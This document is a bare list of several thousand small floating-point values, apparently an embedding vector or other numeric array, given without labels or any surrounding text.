-0.017376359552145004, -0.00019357998098712415, 0.017391404137015343, 0.006198320537805557, -0.011343528516590595, 0.0350235216319561, -0.011147950775921345, 0.017752472311258316, 0.004757812712341547, -0.009222258813679218, -0.0010267848847433925, 0.018429473042488098, -0.00018405965238343924, 0.005810925737023354, 0.0050210910849273205, 0.005145207978785038, -0.0005505334702320397, -0.010516082867980003, -0.006864038296043873, 0.017436537891626358, -0.030419914051890373, 0.01623298041522503, -0.014141799882054329, -0.01812858320772648, -0.003061549039557576, 0.009252347983419895, 0.02795262075960636, 0.015074556693434715, 0.02327379211783409, -0.004287673160433769, -0.022551657631993294, 0.007808078546077013, -0.006660937797278166, -0.010771838948130608, -0.003101040842011571, -0.003631358267739415, -0.007966045290231705, 0.0437793992459774, 0.014247111044824123, -0.021438365802168846, 0.008221801370382309, -0.0115992845967412, -0.032405782490968704, -0.01653387024998665, -0.04447144642472267, 0.008221801370382309, 0.002296161837875843, 0.01483384519815445, -0.011200605891644955, -0.02369503676891327, 0.01432985533028841, -0.0007625664584338665, -0.012690008617937565, 0.028840243816375732, -0.011193083599209785, -0.014946678653359413, 0.02488354966044426, 0.02557559497654438, 0.01740644872188568, 0.007541039492934942, -0.006623326800763607, 0.006262259557843208, -0.015601112507283688, -0.004960913211107254, 0.011471406556665897, -0.002796390326693654, -0.0008100505219772458, -0.023033080622553825, -0.003055907553061843, -0.024522481486201286, 0.01005722675472498, 0.01497676782310009, 0.008334634825587273, 0.0004275919636711478, -0.01761707104742527, 0.007725334260612726, 0.024823371320962906, 0.0008156922413036227, -0.020144542679190636, -0.030374780297279358, -0.004648740403354168, 0.0013662256533280015, -0.0018871404463425279, 0.004231256432831287, 0.003937889356166124, -0.012043096125125885, 0.011403706856071949, 0.01782769337296486, 0.027335798367857933, -0.004231256432831287, 0.017767516896128654, -0.020370209589600563, 0.0035467331763356924, 0.012058140709996223, -0.0019463780336081982, -0.015586068853735924, -0.02727562002837658, 0.019648075103759766, -0.013592676259577274, 0.002089300425723195, 0.0062509761191904545, 0.019452497363090515, 0.0026440650690346956, 0.024026013910770416, 0.0024334427434951067, -0.04203424230217934, -0.016488736495375633, -0.01991887576878071, 0.00018946625641547143, 0.006739921402186155, 0.00689412746578455, 0.005118879955261946, 0.008056312799453735, -0.001196975470520556, 0.01124573964625597, -0.01663918048143387, -0.019738340750336647, 0.025936661288142204, -0.006307392846792936, 0.004031917080283165, 0.01243425253778696, -0.005596541799604893, -0.020866677165031433, -0.002290520118549466, -0.01413427758961916, -0.022446345537900925, -0.019678164273500443, 0.0066383713856339455, 0.005449858494102955, 0.0035128830932080746, -0.018369294703006744, 0.03381996229290962, 0.016157757490873337, -0.025921616703271866, -0.019527718424797058, 0.04471215605735779, -0.007379311136901379, -0.008883758448064327, 0.004517101217061281, 0.01603740267455578, -0.03445183113217354, 0.012659919448196888, -0.022551657631993294, -0.0005961370188742876, -0.002076136413961649, -0.009583326056599617, -0.010659005492925644, 0.03014911338686943, -0.004456923343241215, 0.045133404433727264, 0.011960351839661598, 0.01722591556608677, 0.0077027673833072186, 0.0017771277343854308, -0.01960294134914875, -0.001738576334901154, 0.019377274438738823, 0.033398717641830444, -0.008417380042374134, 0.008266935124993324, 0.013577631674706936, -0.008394813165068626, -0.005807164590805769, -0.012065663002431393, 0.03066062554717064, -0.0028415238484740257, 0.017391404137015343, -0.008673135191202164, 0.013998877257108688, -0.013171431608498096, -0.023213613778352737, -0.0005994280218146741, -0.010365637950599194, 0.001139618456363678, -0.028223421424627304, 0.017857782542705536, 0.002676034579053521, 0.006721115671098232, -0.011621851474046707, -0.01772238314151764, 0.006149426102638245, -0.017075471580028534, 0.0018485889304429293, -0.014811278320848942, 0.008665612898766994, -0.005231713410466909, 0.009666070342063904, 0.012155929580330849, 0.010290415957570076, -0.007337938994169235, 0.006803860422223806, -0.023364057764410973, -0.005983937066048384, -0.016097581014037132, -0.002290520118549466, 0.011057683266699314, 0.01752680540084839, -0.006273542996495962, -0.006687265820801258, 0.00781560130417347, -0.002192731248214841, -0.010282893665134907, -0.01413427758961916, -0.014269677922129631, -0.003911561798304319, -0.007048333063721657, 0.022446345537900925, -0.00367085007019341, 0.011727162636816502, -0.00038527941796928644, 0.010410771705210209, 0.003740430809557438, 0.005946325603872538, -0.005600302945822477, -0.0017573818331584334, -0.009162080474197865, 0.013502409681677818, -0.0090492470189929, 0.022325990721583366, 0.006029070354998112, -0.00450205709785223, 0.010440860874950886, -0.007717811968177557, -0.005487469490617514, 0.009711204096674919, -0.014074099250137806, 0.039356328547000885, 0.002198372734710574, 0.013803298585116863, 0.0004510989529080689, -0.007033288478851318, 0.003458346938714385, -0.023860525339841843, -0.022055190056562424, -0.006130620371550322, 0.001888080732896924, -0.00901163648813963, 0.0031273686327040195, -0.008590390905737877, -0.011569195427000523, -0.002796390326693654, 0.01721087098121643, 0.0026609902270138264, 0.014096666127443314, 0.002066733781248331, 0.025018949061632156, 0.011779817752540112, 0.012652397155761719, -0.008078878745436668, 0.016789626330137253, 0.03406067565083504, 0.02160385623574257, 0.010027137584984303, 0.025304794311523438, 0.022521568462252617, -0.004456923343241215, 0.0053595914505422115, -0.014074099250137806, 0.014374989084899426, -0.019287006929516792, 0.009914304129779339, -0.006326198577880859, 0.00043252843897789717, 0.004972196649760008, 0.019256917759776115, -0.01969320885837078, -0.002916746074333787, 0.005054940935224295, 0.004362895619124174, 0.0036050304770469666, -0.005009807646274567, 0.006239693146198988, 0.0010860224720090628, -0.010591304861009121, -0.012659919448196888, 0.0034827941562980413, 0.018790539354085922, -0.000027767620849772356, 0.0008161623845808208, -0.03156329318881035, 0.00856782402843237, 0.002491740044206381, 0.00015690909640397877, 0.003614433342590928, 0.0016295039094984531, -0.014390033669769764, 0.007996134459972382, 0.005510036367923021, -0.0107492720708251, -0.013855954632163048, -0.0048819296061992645, -0.006096770521253347, 0.010847060941159725, -0.012659919448196888, -0.007356744725257158, -0.01138866227120161, 0.0076125008054077625, -0.005156491417437792, -0.01095237210392952, 0.019151607528328896, 0.004517101217061281, -0.006634610239416361, 0.006427748594433069, -0.01010988187044859, -0.010764316655695438, 0.02507912740111351, -0.004028156399726868, 0.0022641923278570175, -0.008297024294734001, -0.002709884662181139, -0.0107492720708251, 0.011915218085050583, 0.00856782402843237, -0.0053144581615924835, -0.0045885625295341015, 0.019046295434236526, -0.005321980454027653, 0.0036877752281725407, 0.02766677550971508, 0.011772295460104942, 0.01830911636352539, 0.0031160854268819094, -0.001364345196634531, 0.005333263892680407, -0.00034108629915863276, -0.012479386292397976, 0.0013906729873269796, 0.014450211077928543, -0.0008086401503533125, 0.007014483213424683, -0.01194530725479126, 0.006943021900951862, -0.0007268358604051173, -0.012276285327970982, 0.00450205709785223, -0.004802946466952562, 0.01790291629731655, -0.006826427299529314, -0.019753385335206985, -0.005167774390429258, 0.009034202434122562, -0.01448782254010439, 0.019332140684127808, -0.026523396372795105, -0.01448782254010439, -0.012419207952916622, -0.00851516891270876, 0.02924644574522972, -0.0218896996229887, -0.01138866227120161, -0.01573651283979416, -0.02479328215122223, -0.020535698160529137, 0.0015025661559775472, -0.009297480806708336, 0.014721011742949486, -0.00629610987380147, 0.015225001610815525, -0.0031348909251391888, -0.017737427726387978, -0.01919674128293991, 0.007048333063721657, 0.04040943831205368, -0.016263069584965706, -0.012607263401150703, -0.0220852792263031, -0.00856782402843237, -0.008823580108582973, -0.0023262507747858763, 0.003078474197536707, 0.005953847896307707, 0.002743734745308757, 0.009470492601394653, -0.00900411419570446, -0.014254633337259293, -0.028133153915405273, -0.0037178639322519302, 0.023349013179540634, 0.009147035889327526, -0.0013709270860999823, -0.0003627127152867615, -0.001980228116735816, 0.008199234493076801, -0.015781646594405174, 0.006822666153311729, 0.0011367975967004895, 0.003712222445756197, 0.02270210161805153, 0.0012872422812506557, 0.02996858023107052, -0.01173468492925167, 0.011569195427000523, -0.022310946136713028, 0.012682486325502396, 0.007732856553047895, -0.001019262708723545, 0.00801870133727789, -0.004520862363278866, 0.013652854599058628, 0.01752680540084839, -0.005081268958747387, 0.0062246485613286495, 0.002924268366768956, -0.006239693146198988, 0.008635524660348892, 0.016699358820915222, -0.007198777515441179, 0.026703929528594017, -0.01502190064638853, 0.0074357278645038605, 0.016263069584965706, -0.006721115671098232, -0.0194073636084795, -0.0015740274684503675, -0.01487897802144289, 0.017150692641735077, 0.02297290228307247, 0.00886119157075882, -0.017361314967274666, 0.009545714594423771, 0.009274913929402828, 0.00277382368221879, -0.006563148926943541, 0.012915675528347492, 0.016082536429166794, 0.02040029875934124, 0.01538296788930893, 0.03246596083045006, -0.01582678034901619, -0.008447468280792236, -0.018354250118136406, -0.014547999948263168, -0.008688179776072502, -0.005980175919830799, -0.02219058945775032, 0.005288130138069391, -0.00891384668648243, -0.0023036841303110123, -0.007037049625068903, -0.015405534766614437, -0.005923759192228317, -0.009131992235779762, -0.0030013711657375097, -0.0034564663656055927, -0.0012571533443406224, -0.02777208760380745, 0.00885366927832365, 0.004385462496429682, 0.015089601278305054, -0.0029844462405890226, 0.0025763651356101036, -0.04904496297240257, -0.023905659094452858, 0.005461141932755709, -0.0012157810851931572, -0.0025820068549364805, 0.001789351343177259, -0.0021400754339993, -0.0033925273455679417, 0.017361314967274666, -0.008274457417428493, 0.01740644872188568, -0.012043096125125885, -0.004494534805417061, 0.010282893665134907, -0.012832931242883205, 0.030239379033446312, -0.01299089752137661, -0.0032834550365805626, 0.003264649538323283, 0.0009501521708443761, 0.020746320486068726, 0.0018391861813142896, -0.008417380042374134, 0.0231985691934824, -0.00689412746578455, -0.020851632580161095, 0.007710289675742388, -0.009139513596892357, -0.02488354966044426, 0.0057921200059354305, 0.00023119115212466568, -0.011178039014339447, -0.014803756028413773, -0.015796691179275513, 0.010839538648724556, 0.010832016356289387, 0.027019863948225975, 0.031202225014567375, -0.004708918277174234, -0.000025181852834066376, 0.0013493007281795144, -0.00425758445635438, -0.0262676402926445, -0.006382615305483341, -0.004787901882082224, 0.04242539778351784, 0.010237759910523891, -0.007913390174508095, -0.0016248024767264724, 0.0035523748956620693, 0.00028067335369996727, -0.01517234556376934, 0.0120882298797369, -0.029186267405748367, 0.012802842073142529, 0.0004945868859067559, 0.01089219469577074, -0.01054617203772068, -0.002469173166900873, -0.006258498411625624, 0.010350593365728855, -0.01125326193869114, -0.008522691205143929, 0.006954305339604616, -0.02040029875934124, -0.004592323675751686, 0.006164470687508583, 0.023138390854001045, 0.019587896764278412, 0.0167294479906559, 0.006277304142713547, -0.004167317412793636, -0.012772752903401852, -0.0004677889228332788, -0.015194912441074848, -0.02061092108488083, 0.01498429011553526, 0.017195826396346092, -0.0049759577959775925, 0.0019313335651531816, -0.009605892933905125, 0.013359487056732178, -0.015450668521225452, 0.0030916379764676094, 0.006785054691135883, 0.016834760084748268, 0.0005279667675495148, -0.0029543573036789894, 0.011200605891644955, 0.015044467523694038, -0.014442688785493374, -0.008673135191202164, 0.008597913198173046, 0.01039572712033987, -0.019166652113199234, -0.005438575055450201, -0.0053144581615924835, -0.020836587995290756, 0.006807621568441391, -0.009726248681545258, -0.010215193033218384, -0.010538649745285511, -0.0009750695317052305, -0.004682590719312429, 0.0005105716409161687, 0.010079793632030487, -0.017586981877684593, -0.0038288170471787453, -0.009252347983419895, 0.007187494542449713, 0.015450668521225452, 0.015051989816129208, 0.00906429160386324, 0.017496716231107712, 0.007386833429336548, -0.02011445350944996, 0.012516996823251247, -0.0037272667977958918, 0.003394407918676734, 0.012577175162732601, -0.011659462004899979, -0.0060403537936508656, 0.02825351059436798, 0.03788197040557861, 0.005573975387960672, -0.002589528914541006, -0.001472477219067514, -0.008981547318398952, -0.020550742745399475, -0.011117861606180668, -0.016879891976714134, 0.0065180156379938126, -0.021739255636930466, -0.015044467523694038, -0.006991916336119175, -0.007100988645106554, -0.005897431168705225, 0.0028396432753652334, -0.0027982708998024464, -0.0026403041556477547, -0.005118879955261946, 0.002583887195214629, -0.023619813844561577, -0.007510950323194265, 0.026312774047255516, -0.006089248228818178, -0.009575803764164448, 0.02098703198134899, 0.007048333063721657, 0.006777532864362001, -0.013472320511937141, -0.004885690752416849, -0.006589476950466633, -0.019332140684127808, -0.010042182169854641, 0.016067491844296455, 0.009997048415243626, -0.01497676782310009, 0.012509474530816078, 0.019768429920077324, -0.01293072011321783, 0.004445640370249748, -0.03788197040557861, -0.004144751001149416, 0.0016266830498352647, 0.018534783273935318, 0.026538440957665443, 0.013209042139351368, -0.0275765098631382, 0.002187089528888464, -0.010079793632030487, -0.011539106257259846, -0.012659919448196888, -0.013810820877552032, 0.0025820068549364805, -0.002457889961078763, -0.0002872553013730794, 0.0047465297393500805, 0.018986118957400322, 0.010019615292549133, -0.01005722675472498, -0.010019615292549133, -0.024251680821180344, -0.03327836096286774, 0.0011762892827391624, 0.010440860874950886, 0.0027531376108527184, -0.0006370391929522157, -0.014510389417409897, -0.021874655038118362, -0.0015270134899765253, 0.012404163368046284, 0.01703033782541752, 0.005393441766500473, -0.007710289675742388, -0.010463426820933819, 0.000558055704459548, -0.010470949113368988, 0.03436156362295151, 0.016458647325634956, 0.00010431222472107038, -0.007883301004767418, -0.010516082867980003, 0.009327569976449013, 0.010974938981235027, 0.00990678183734417, -0.005043657962232828, 0.003584344405680895, 0.03282702714204788, 0.01969320885837078, 0.01125326193869114, 0.0058372532948851585, -0.0015505204210057855, -0.01264487486332655, 0.024657882750034332, 0.004114661831408739, 0.01889585144817829, 0.0004431065754033625, -0.011682028882205486, 0.02498885989189148, -0.003400049638003111, -0.013825865462422371, -0.014044010080397129, -0.02936680056154728, 0.006495448760688305, 0.013051075860857964, -0.0008481318363919854, 0.01010235957801342, 0.0014668356161564589, -0.0038306976202875376, -0.012712575495243073, 0.022626878693699837, -0.007522233761847019, 0.005592780653387308, -0.018294071778655052, -0.0002905462752096355, 0.0029393129516392946, -0.0010926044778898358, 0.024763192981481552, -0.020174631848931313, 0.013502409681677818, 0.005668003112077713, -0.008304545655846596, -0.01830911636352539, -0.0038024892564862967, -0.021919788792729378, -0.012201063334941864, 0.007477100472897291, -0.007732856553047895, -0.008831102401018143, -0.011584240011870861, 0.0013483604416251183, 0.01448782254010439, 0.012998419813811779, -0.015337835066020489, 0.02080649882555008, 0.0005886147846467793, 0.005668003112077713, 0.0028734933584928513, -0.013652854599058628, -0.01593209058046341, -0.025003904476761818, -0.010734227485954762, 0.020641010254621506, -0.008266935124993324, -0.01710555888712406, -0.03914570435881615, 0.0016031761188060045, -0.0008076998637989163, -0.0015984746860340238, -0.0024127564392983913, -0.019061340019106865, -0.02277732454240322, 0.003998067229986191, -0.0019783475436270237, 0.006322437431663275, -0.016864847391843796, 0.026944641023874283, -0.005502514075487852, 0.006495448760688305, 0.029126089066267014, -0.012170974165201187, -0.01572146825492382, 0.0028227181173861027, 0.0012468101922422647, -0.013750643469393253, 0.0050662243738770485, -0.028223421424627304, -0.01363028772175312, 0.005641675554215908, -0.012163451872766018, -0.011907695792615414, -0.011080250144004822, 0.018429473042488098, -0.0069317384622991085, -0.029788045212626457, -0.008628002367913723, 0.008409857749938965, 0.0023789063561707735, 0.030675670132040977, -0.00768772279843688, 0.007973567582666874, 0.01075679436326027, 0.005182818975299597, -0.023439280688762665, -0.01109529472887516, -0.016353337094187737, -0.004415551200509071, 0.00816162396222353, -0.004468206781893969, -0.0061795152723789215, 0.007033288478851318, 0.04501304775476456, 0.003164979862049222, -0.014292243868112564, 0.018850717693567276, 0.002589528914541006, -0.009387747384607792, -0.008319590240716934, 0.021724211052060127, -0.004622412845492363, -0.007935957051813602, 0.0025349927600473166, 0.0033530357759445906, 0.006935499608516693, -0.004863124340772629, -0.009831559844315052, 0.006194559391587973, -0.03755098953843117, -0.03854392468929291, -0.03186418116092682, -0.011268306523561478, -0.025605684146285057, -0.003990544937551022, -0.013795777224004269, 0.013585153967142105, -0.0004172488988842815, 0.0003631828585639596, 0.020625965669751167, 0.013908610679209232, 0.013261698186397552, -0.01482632290571928, 0.03204471617937088, 0.005412247031927109, 0.005280608311295509, -0.01653387024998665, -0.010094837285578251, -0.016142712906003, 0.009320047684013844, -0.00820675678551197, -0.00664213253185153, -0.003601269330829382, -0.010094837285578251, 0.013713032007217407, -0.009417836554348469, -0.01060634944587946, 0.01563120260834694, -0.016759537160396576, -0.011012550443410873, -0.01900116167962551, -0.00906429160386324, 0.009688637219369411, 0.000563697365578264, 0.00435161218047142, 0.0067286379635334015, 0.003907800652086735, -0.01020014937967062, -0.014435166493058205, 0.005577736534178257, 0.017933005467057228, 0.0026779151521623135, -0.03442174196243286, -0.0013540020445361733, -0.014164365828037262, 0.031593382358551025, 0.004193645436316729, 0.0000013700162071472732, -0.006288587581366301, 0.0024616511072963476, 0.01179486233741045, 0.0032383217476308346, 0.0021269116550683975, -0.01538296788930893, 0.019572852179408073, 0.02337910234928131, -0.0035410914570093155, 0.01129087246954441, 0.023258747532963753, -0.0013389575760811567, 0.02598179504275322, 0.005009807646274567, 0.009530670009553432, -0.008379768580198288, 0.014013921841979027, 0.010854583233594894, -0.009733770973980427, 0.005758270155638456, -0.007236388977617025, -0.01851973868906498, 0.002094942145049572, -0.0021833283826708794, -0.0017564415466040373, 0.010628916323184967, -0.0031348909251391888, -0.006559387780725956, -0.008454990573227406, 0.0022641923278570175, 0.007292805705219507, 0.015420579351484776, -0.0020874198526144028, 0.020039230585098267, -0.007518472615629435, 0.014788711443543434, 0.021934833377599716, -0.017541849985718727, 0.011117861606180668, -0.012750186026096344, 0.00034249669988639653, -0.012690008617937565, 0.007988612167537212, -0.016157757490873337, -0.015074556693434715, 0.00012811303895432502, 0.004757812712341547, -0.02197996713221073, -0.004505818244069815, -0.014044010080397129, 0.018143627792596817, -0.010463426820933819, -0.018294071778655052, -0.0002163817553082481, -0.014104188419878483, -0.0012327060103416443, 0.014344899915158749, -0.06029822677373886, 0.006153187248855829, -0.021844567731022835, -0.006946783047169447, 0.02798270992934704, 0.01632324792444706, 0.000921003520488739, -0.004475729074329138, -0.010869627818465233, -0.008334634825587273, -0.0007334178080782294, -0.005416008178144693, 0.004137228708714247, -0.0012618546606972814, 0.001559923286549747, -0.018986118957400322, -0.012802842073142529, 0.0013173312181606889, -0.029231401160359383, 0.004754051566123962, -0.003678372362628579, -0.04985736683011055, 0.0062246485613286495, 0.007085944060236216, 0.0038288170471787453, 0.01642855815589428, -0.003922844771295786, -0.02349945902824402, -0.009222258813679218, 0.022250767797231674, -0.00370658072642982, -0.010335548780858517, -0.002243506256490946, -0.007725334260612726, 0.005389680620282888, -0.009147035889327526, -0.0001632559869904071, 0.001663353992626071, 0.02438708208501339, -0.015902001410722733, -0.00001639611946302466, -0.005558930803090334, 0.010583782568573952, -0.014931634068489075, 0.01533031277358532, 0.007401878014206886, 0.01462322287261486, -0.00452462350949645, 0.010335548780858517, -0.02768182009458542, 0.01763211563229561, -0.001938855741173029, -0.0004644979489967227, 0.011200605891644955, -0.02297290228307247, -0.01209575217217207, -0.016383424401283264, 0.0036520445719361305, -0.01532279048115015, 0.006006503477692604, 0.015307745896279812, 0.009771381504833698, -0.00036036199890077114, 0.0009506223141215742, 0.01972329616546631, -0.000511982012540102, -0.003463988658040762, -0.00748462276533246, 0.007037049625068903, 0.011275828815996647, 0.007258955389261246, -0.004581040237098932, 0.0035655389074236155, -0.013818343169987202, -0.015856869518756866, -0.012336463667452335, 0.0010794405825436115, -0.0006953364936634898, 0.0066835046745836735, 0.008733313530683517, -0.00021050500799901783, -0.006521776784211397, 0.004596084821969271, -0.005803403444588184, 0.018534783273935318, 0.00025411046226508915, 0.008244368247687817, 0.020430386066436768, -0.0027343318797647953, -0.010816971771419048, -0.006085487082600594, -0.016654225066304207, -0.02360476925969124, -0.00010625155118759722, -0.009523147717118263, 0.0028734933584928513, -0.006559387780725956, -0.004118422977626324, 0.004374179057776928, 0.00018194403673987836, 0.022566702216863632, 0.014066576957702637, -0.009282436221837997, 0.007405639160424471, 0.0008354380843229592, 0.009305003099143505, -0.0038739503361284733, 0.01751176081597805, 0.02635790780186653, 0.03183409199118614, 0.007488383911550045, 0.008725791238248348, 0.004754051566123962, 0.012411685660481453, -0.00403567822650075, -0.0049759577959775925, 0.005167774390429258, -0.00230180355720222, -0.020475519821047783, 0.016338292509317398, 0.014044010080397129, 0.00835720170289278, 0.0076576340943574905, -0.011689551174640656, -0.025304794311523438, -0.006096770521253347, 0.012231152504682541, 0.0011264545610174537, 0.0015777884982526302, -0.004039439372718334, 0.008056312799453735, -0.022356078028678894, 0.00037940265610814095, -0.002388309221714735, -0.004660023842006922, -0.01703033782541752, 0.008327112533152103, 0.0051602525636553764, 0.00017113081412389874, 0.004118422977626324, -0.00590119231492281, 0.001145260059274733, 0.01552589051425457, 0.019858697429299355, -0.0005039896350353956, -0.005145207978785038, -0.005487469490617514, 0.01144883967936039, 0.00940279196947813, 0.003356796922162175, -0.017481671646237373, -0.00031945985392667353, 0.01841442845761776, -0.008876236155629158, -0.013968788087368011, 0.004934585187584162, -0.008394813165068626, -0.009493059478700161, -0.004701395984739065, -0.005348308011889458, 0.015555979683995247, 0.0025650816969573498, 0.037581078708171844, 0.0064992099069058895, -0.0007978269131854177, -0.007304089143872261, 0.01713564805686474, -0.007164927665144205, -0.017556894570589066, 0.004761573858559132, 0.0007465817034244537, 0.004013111814856529, -0.00821427907794714, 0.0001973410981008783, -0.009493059478700161, 0.01623298041522503, 0.015962179750204086, -0.01602235808968544, 0.012945764698088169, -0.01144131738692522, 0.018354250118136406, 0.00801870133727789, 0.01174220722168684, 0.0076125008054077625, -0.006006503477692604, 0.010350593365728855, -0.0056191086769104, -0.007920912466943264, -0.0005030494066886604, 0.017556894570589066, -0.0024428453762084246, 0.005133924540132284, -0.007533517200499773, 0.0030916379764676094, -0.033699605613946915, 0.003008893458172679, 0.02986326813697815, -0.028328731656074524, -0.024131326004862785, -0.022566702216863632, -0.00667222123593092, 0.004810468293726444, 0.004513340070843697, 0.03929615020751953, -0.006439032033085823, 0.017346270382404327, 0.013697987422347069, 0.0013709270860999823, 0.012464341707527637, 0.016894936561584473, 0.01284797489643097, 0.003779922379180789, -0.009523147717118263, 0.004238778725266457, -0.004663784988224506, -0.017872827127575874, -0.0019727058243006468, 0.001685920637100935, 0.029186267405748367, 0.016744492575526237, 0.018143627792596817, -0.013494887389242649, -0.0026967208832502365, -0.0022359839640557766, -0.008673135191202164, -0.009395269677042961, 0.010854583233594894, 0.013404620811343193, 0.006111815106123686, 0.002239745110273361, -0.005577736534178257, -0.022220678627490997, 0.025831351056694984, 0.011952829547226429, -0.010388204827904701, -0.003813772462308407, -0.006563148926943541, 0.016398468986153603, 0.018534783273935318, -0.008876236155629158, 0.033188097178936005, 0.007582411635667086, -0.03171373903751373, -0.01019262708723545, -0.02170916646718979, 0.005765791982412338, 0.016985204070806503, -0.024116281419992447, -0.005133924540132284, -0.012569652870297432, -0.021679077297449112, 0.013209042139351368, -0.0027343318797647953, -0.02936680056154728, -0.009523147717118263, 0.0060666813515126705, 0.001674637314863503, -0.005115118809044361, 0.004994763061404228, -0.006164470687508583, 0.01812858320772648, -0.006773771718144417, -0.047029007226228714, 0.010884672403335571, -0.005923759192228317, 0.0030295797623693943, 0.015435623936355114, -0.015766602009534836, 0.024958772584795952, 0.013005942106246948, 0.0032364411745220423, -0.0059576090425252914, -0.011659462004899979, -0.031593382358551025, 0.01740644872188568, -0.003573060967028141, 0.005190341267734766, 0.009831559844315052, 0.0010455904994159937, 0.012772752903401852, 0.017195826396346092, 0.006630849093198776, 0.0052693248726427555, 0.001974586397409439, -0.027741998434066772, -0.0005312577704899013, 0.025199484080076218, -0.011975396424531937, 0.011817429214715958, -0.022927768528461456, -0.02497381530702114, -0.0042688678950071335, 0.002480456605553627, 0.013622765429317951, 0.00870322436094284, 0.011779817752540112, 0.0009336972725577652, -0.015856869518756866, -0.004750290419906378, -0.001575907925143838, -0.008492602035403252, -0.0058372532948851585, 0.011200605891644955, -0.0020780169870704412, 0.0009252347517758608, -0.008424901403486729, 0.0036501639988273382, -0.003424496855586767, -0.005825969856232405, 0.017692293971776962, -0.016398468986153603, -0.005261802580207586, -0.018880806863307953, 0.015962179750204086, 0.009252347983419895, -0.01930205151438713, -0.0037893252447247505, 0.015187390148639679, -0.008898802101612091, -0.01045590452849865, -0.0009355778456665576, -0.013005942106246948, -0.00006740626849932596, -0.0016059968620538712, 0.017271049320697784, -0.01468340028077364, 0.006077964790165424, 0.006333720870316029, 0.015841824933886528, 0.024341948330402374, 0.012411685660481453, 0.007823123596608639, -0.0021776866633445024, 0.006649654824286699, 0.029637601226568222, 0.010064749047160149, 0.009982003830373287, -0.0035034804604947567, -0.010764316655695438, 0.015540935099124908, -0.005611586384475231, 0.03114204853773117, 0.017165737226605415, -0.005220430437475443, -0.006766249425709248, 0.007793034426867962, -0.0014226424973458052, 0.005694331135600805, 0.0035881055518984795, 0.01174220722168684, -0.009493059478700161, 0.01039572712033987, 0.015586068853735924, -0.00015773183258716017, -0.018263984471559525, 0.033579252660274506, 0.01368294283747673, -0.003900278126820922, -0.005716897547245026, 0.0035185248125344515, 0.0011772295692935586, 0.008266935124993324, -0.005668003112077713, -0.013870999217033386, 0.022566702216863632, 0.002516187261790037, 0.006581954658031464, -0.0026139761321246624, -0.008041268214583397, -0.025109216570854187, 0.00323456060141325, -0.019678164273500443, 0.016172802075743675, 0.015300223603844643, 0.017556894570589066, -0.007699006237089634, -0.004046961665153503, -0.0035316888242959976, 0.01630820333957672, 0.0032665301114320755, -0.031021691858768463, -0.01760202646255493, -0.025530461221933365, 0.0034752720966935158, -0.0017649041255936027, -0.001294764457270503, -0.008424901403486729, -0.010779361240565777, 0.00004507463381742127, 0.0018899611895903945, -0.009237303398549557, -0.011877607554197311, 0.02279236912727356, 0.02577117271721363, 0.010019615292549133, 0.012908153235912323, 0.03481289744377136, -0.016669269651174545, 0.007525994908064604, -0.01969320885837078, 0.024056103080511093, 0.0026891985908150673, -0.011403706856071949, -0.013517454266548157, 0.02479328215122223, -0.0037253862246870995, -0.0068677994422614574, 0.009026680141687393, -0.01593209058046341, 0.020370209589600563, 0.015646247193217278, -0.012629830278456211, -0.007386833429336548, 0.005032374523580074, -0.0031612187158316374, 0.007356744725257158, 0.008477557450532913, 0.01751176081597805, 0.011366095393896103, 0.0013906729873269796, -0.015225001610815525, -0.003601269330829382, -0.005175296682864428, 0.011719640344381332, -0.011336006224155426, 0.005856059025973082, -0.0036821335088461637, 0.002053569769486785, -0.02258174493908882, 0.004133467562496662, -0.013457275927066803, 0.026041973382234573, 0.003655805718153715, 0.014465255662798882, -0.003123607486486435, 0.004095856100320816, -0.003896517213433981, 0.0008039387175813317, -0.02360476925969124, -0.016052447259426117, 0.0013323756866157055, -0.031683649867773056, 0.009839082136750221, 0.0030972796957939863, 0.009628458879888058, -0.014638266526162624, -0.02805793285369873, -0.01483384519815445, -0.0018956029089167714, -0.006533060222864151, -0.002457889961078763, 0.011546628549695015, 0.015571024268865585, 0.0346323661506176, 0.0018542306497693062, -0.0027192875277251005, -0.0017160095740109682, 0.005856059025973082, -0.011336006224155426, -0.007210060954093933, -0.019287006929516792, 0.006258498411625624, 0.005694331135600805, 0.014961723238229752, 0.012945764698088169, 0.011080250144004822, -0.0025067843962460756, -0.012110796757042408, 0.005352069158107042, 0.004761573858559132, -0.004780379589647055, 0.010237759910523891, 0.005397202912718058, 0.0120882298797369, 0.0031800244469195604, 0.017286093905568123, -0.01632324792444706, -0.0018232014263048768, 0.007127316668629646, 0.021769344806671143, -0.009771381504833698, 0.023228658363223076, 0.004863124340772629, -0.0017846499104052782, 0.014954200945794582, -0.004471967928111553, -0.008169146254658699, -0.0077779898419976234, -0.004945868626236916, 0.030871247872710228, 0.015209957025945187, 0.011967874132096767, -0.0025688428431749344, -0.0268543753772974, 0.020656054839491844, 0.007604978512972593, 0.011433795094490051, 0.0020460474770516157, 0.004182361997663975, -0.007383072283118963, 0.007913390174508095, -0.010643960908055305, 0.020821543410420418, 0.007800556253641844, -0.007142360787838697, -0.016142712906003, -0.0224764347076416, 0.0062246485613286495, 0.03788197040557861, 0.008801013231277466, -0.013660376891493797, -0.011320961639285088, -0.0013135700719431043, -0.0033116634003818035, -0.03300756216049194, 0.017060426995158195, -0.0004809528181795031, 0.006235931999981403, 0.01059882715344429, -0.0010907239047810435, 0.0036445222795009613, -0.0005575855611823499, 0.004565996117889881, -0.009530670009553432, 0.02121269889175892, 0.013968788087368011, -0.02119765430688858, 0.003131129778921604, 0.006100531667470932, -0.020671097561717033, -0.0011809907155111432, 0.015646247193217278, 0.003636999987065792, -0.011351050809025764, -0.004960913211107254, -0.0037611168809235096, -0.020189674571156502, 0.0060215480625629425, -0.004765335004776716, 0.01632324792444706, -0.015977224335074425, -0.01871531829237938, 0.000006809678325225832, -0.01960294134914875, -0.017180781811475754, 0.00046590834972448647, -0.00564919738098979, 0.016052447259426117, -0.03354916349053383, -0.010222715325653553, -0.006578193511813879, 0.0008998471894301474, 0.015217479318380356, -0.0027268098201602697, 0.00016760476864874363, 0.0008645867346785963, -0.031172137707471848, 0.006284826435148716, 0.004979718942195177, 0.014653311111032963, -0.02100207656621933, -0.00017383412341587245, 0.0004978778306394815, -0.00370658072642982, -0.015202434733510017, -0.006375093013048172, 0.020024186000227928, 0.006055398378521204, 0.031503114849328995, -0.005337025038897991, -0.0036633277777582407, 0.014149322174489498, 0.008394813165068626, 0.008823580108582973, -0.008424901403486729, -0.002766301389783621, 0.00039632769767194986, 0.006134381517767906, 0.0047277240082621574, -0.020445430651307106, -0.011208128184080124, -0.008266935124993324, -0.0010944850509986281, 0.0011706476798281074, -0.012878064066171646, -0.008169146254658699, 0.0010615752544254065, 